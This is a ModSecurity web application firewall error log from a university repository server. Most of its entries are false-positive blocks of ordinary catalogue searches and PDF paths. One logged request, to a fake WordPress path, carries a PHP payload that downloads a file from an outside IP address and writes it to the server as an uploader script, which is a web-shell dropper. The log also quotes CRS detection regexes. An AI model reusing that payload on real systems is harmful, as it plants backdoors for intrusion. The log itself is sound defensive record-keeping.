[Mon Aug 28 13:18:30.473678 2023] [:error] [pid 43591] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//BAB II_RAIHAN.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOw8NsCo-f0AAKpHB6gAAAAO"]
[Mon Aug 28 13:18:35.179293 2023] [:error] [pid 43591] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//LAMPIRAN_ RAIHAN.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOw8O8Co-f0AAKpHB6oAAAAO"]
[Mon Aug 28 13:18:40.566756 2023] [:error] [pid 43568] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//DAFTAR PUSTAKA_RAIHAN.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOw8QMCo-f0AAKowTC8AAAAK"]
[Mon Aug 28 13:25:22.796805 2023] [:error] [pid 43601] [client 47.128.20.153] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22JAVASCRIPTS,ALGORITHMS\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw90sCo-f0AAKpR9Z4AAAAD"]
[Mon Aug 28 13:26:06.854245 2023] [:error] [pid 43692] [client 47.128.20.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Artificial intelligence\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw9-sCo-f0AAKqsir0AAAAe"]
[Mon Aug 28 13:27:53.359050 2023] [:error] [pid 43774] [client 34.72.81.166] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:vz. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '].'/ found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w '),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZOw@acCo-f0AAKr@owoAAAAE"]
[Mon Aug 28 13:28:44.593452 2023] [:error] [pid 43777] [client 40.77.167.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22KESALAHAN PEMBERIAN OBAT OLEH APOTEKER\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw@nMCo-f0AAKsBH@EAAAAA"]
[Mon Aug 28 13:35:34.898793 2023] [:error] [pid 44064] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//DAFTAR ISI_ RAIHAN.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOxANsCo-f0AAKwgQsgAAAAM"]
[Mon Aug 28 13:38:11.375067 2023] [:error] [pid 44114] [client 47.128.30.186] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/cover_Fundamentals_of_information_systems.PNG.PNG"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxA08Co-f0AAKxS3F8AAAAI"]
[Mon Aug 28 13:41:57.773590 2023] [:error] [pid 44114] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//DAFTAR ISI_ RAIHAN.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOxBtcCo-f0AAKxS3G4AAAAI"]
[Mon Aug 28 13:43:15.779314 2023] [:error] [pid 44187] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//LEMBAR PERNYATAAN KEASLIAN_ RAIHAN.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOxCA8Co-f0AAKybWEsAAAAE"]
[Mon Aug 28 13:54:55.621578 2023] [:error] [pid 44440] [client 47.128.17.162] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Software architecture\\xe2\\x80\\x94Vocational guidance.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxEv8Co-f0AAK2YysEAAAAB"]
[Mon Aug 28 14:15:14.212261 2023] [:error] [pid 44851] [client 47.128.28.105] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Pengaruh, Model Pembelajaran Kooperatif Scramble, \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxJgsCo-f0AAK8zpDcAAAAO"]
[Mon Aug 28 14:24:35.853427 2023] [:error] [pid 44858] [client 47.128.24.190] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22JENS O. RIIS\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxLs8Co-f0AAK86m28AAAAM"]
[Mon Aug 28 14:29:56.608110 2023] [:error] [pid 44952] [client 47.128.27.163] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Ausiello, Giorgio\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxM9MCo-f0AAK@YXqQAAAAL"]
[Mon Aug 28 14:36:55.058734 2023] [:error] [pid 45055] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a \\x0d\\x0a found within ARGS:title: PEMBUATAN SIMULASI GERBANG TOL DENGAN RFID\\x0d\\x0aBERBASIS MIKROKONTROLER ATMEGA 328P \\x0d\\x0a \\x0d\\x0aDiajukan sebagai syarat untuk meraih gelar Sarjana Teknik pada Strata 1 (S1)  \\x0d\\x0adi Program Studi Teknik Elektro Universitas Langlangbuana "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOxOl8Co-f0AAK--Em4AAAAI"]
[Mon Aug 28 14:36:56.122316 2023] [:error] [pid 45055] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a \\x0d\\x0a found within ARGS:title: PEMBUATAN SIMULASI GERBANG TOL DENGAN RFID\\x0d\\x0aBERBASIS MIKROKONTROLER ATMEGA 328P \\x0d\\x0a \\x0d\\x0aDiajukan sebagai syarat untuk meraih gelar Sarjana Teknik pada Strata 1 (S1)  \\x0d\\x0adi Program Studi Teknik Elektro Universitas Langlangbuana "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOxOmMCo-f0AAK--Em8AAAAI"]
[Mon Aug 28 14:36:56.356794 2023] [:error] [pid 45055] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a \\x0d\\x0a found within ARGS:title: PEMBUATAN SIMULASI GERBANG TOL DENGAN RFID\\x0d\\x0aBERBASIS MIKROKONTROLER ATMEGA 328P \\x0d\\x0a \\x0d\\x0aDiajukan sebagai syarat untuk meraih gelar Sarjana Teknik pada Strata 1 (S1)  \\x0d\\x0adi Program Studi Teknik Elektro Universitas Langlangbuana "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOxOmMCo-f0AAK--EnAAAAAI"]
[Mon Aug 28 14:36:56.547719 2023] [:error] [pid 45055] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a \\x0d\\x0a found within ARGS:title: PEMBUATAN SIMULASI GERBANG TOL DENGAN RFID\\x0d\\x0aBERBASIS MIKROKONTROLER ATMEGA 328P \\x0d\\x0a \\x0d\\x0aDiajukan sebagai syarat untuk meraih gelar Sarjana Teknik pada Strata 1 (S1)  \\x0d\\x0adi Program Studi Teknik Elektro Universitas Langlangbuana "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOxOmMCo-f0AAK--EnEAAAAI"]
[Mon Aug 28 14:36:56.747540 2023] [:error] [pid 45055] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a \\x0d\\x0a found within ARGS:title: PEMBUATAN SIMULASI GERBANG TOL DENGAN RFID\\x0d\\x0aBERBASIS MIKROKONTROLER ATMEGA 328P \\x0d\\x0a \\x0d\\x0aDiajukan sebagai syarat untuk meraih gelar Sarjana Teknik pada Strata 1 (S1)  \\x0d\\x0adi Program Studi Teknik Elektro Universitas Langlangbuana "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOxOmMCo-f0AAK--EnIAAAAI"]
[Mon Aug 28 14:36:56.939106 2023] [:error] [pid 45055] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a \\x0d\\x0a found within ARGS:title: PEMBUATAN SIMULASI GERBANG TOL DENGAN RFID\\x0d\\x0aBERBASIS MIKROKONTROLER ATMEGA 328P \\x0d\\x0a \\x0d\\x0aDiajukan sebagai syarat untuk meraih gelar Sarjana Teknik pada Strata 1 (S1)  \\x0d\\x0adi Program Studi Teknik Elektro Universitas Langlangbuana "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOxOmMCo-f0AAK--EnMAAAAI"]
[Mon Aug 28 14:38:41.696773 2023] [:error] [pid 45180] [client 47.128.26.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Software engineering.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxPAcCo-f0AALB8ufQAAAAS"]
[Mon Aug 28 14:39:55.902789 2023] [:error] [pid 45184] [client 47.128.22.126] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/cover_Wireless_multimedia.PNG.PNG"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxPS8Co-f0AALCAWWwAAAAC"]
[Mon Aug 28 14:54:17.174381 2023] [:error] [pid 45519] [client 47.128.26.119] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Teacher_Preparation_in_Northern_Ireland.png.png"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxSqcCo-f0AALHPSmEAAAAO"]
[Mon Aug 28 14:54:29.664587 2023] [:error] [pid 45516] [client 47.128.24.182] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Kieso. Donald E\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxStcCo-f0AALHMzRUAAAAH"]
[Mon Aug 28 15:06:08.390576 2023] [:error] [pid 45690] [client 36.72.25.162] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//Nuri Depan-digabungkan_compressed.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOxVcMCo-f0AALJ6WIYAAAAZ"]
[Mon Aug 28 15:12:53.851892 2023] [:error] [pid 45868] [client 47.128.22.1] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/cover_Information_technology_governance.PNG.PNG"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxXBcCo-f0AALMszR8AAAAR"]
[Mon Aug 28 15:22:55.262122 2023] [:error] [pid 45859] [client 47.128.21.142] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Fitz Gerald, Jerry\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxZX8Co-f0AALMjvpUAAAAj"]
[Mon Aug 28 15:27:41.057293 2023] [:error] [pid 46228] [client 47.128.22.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Jullien,  Nicolas\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxafcCo-f0AALSUjf4AAAAR"]
[Mon Aug 28 15:28:11.914921 2023] [:error] [pid 46236] [client 47.128.25.83] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Fattah, Hossam\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxam8Co-f0AALScRzcAAAAA"]
[Mon Aug 28 15:36:19.676398 2023] [:error] [pid 46297] [client 47.128.26.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22BEST PRACTICES IN GREEN SUPPLY CHAIN MANAGEMENT\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxcg8Co-f0AALTZZG0AAAAR"]
[Mon Aug 28 15:39:34.212391 2023] [:error] [pid 46423] [client 47.128.21.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Serpanos, Damirios\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxdRsCo-f0AALVX5lYAAAAB"]
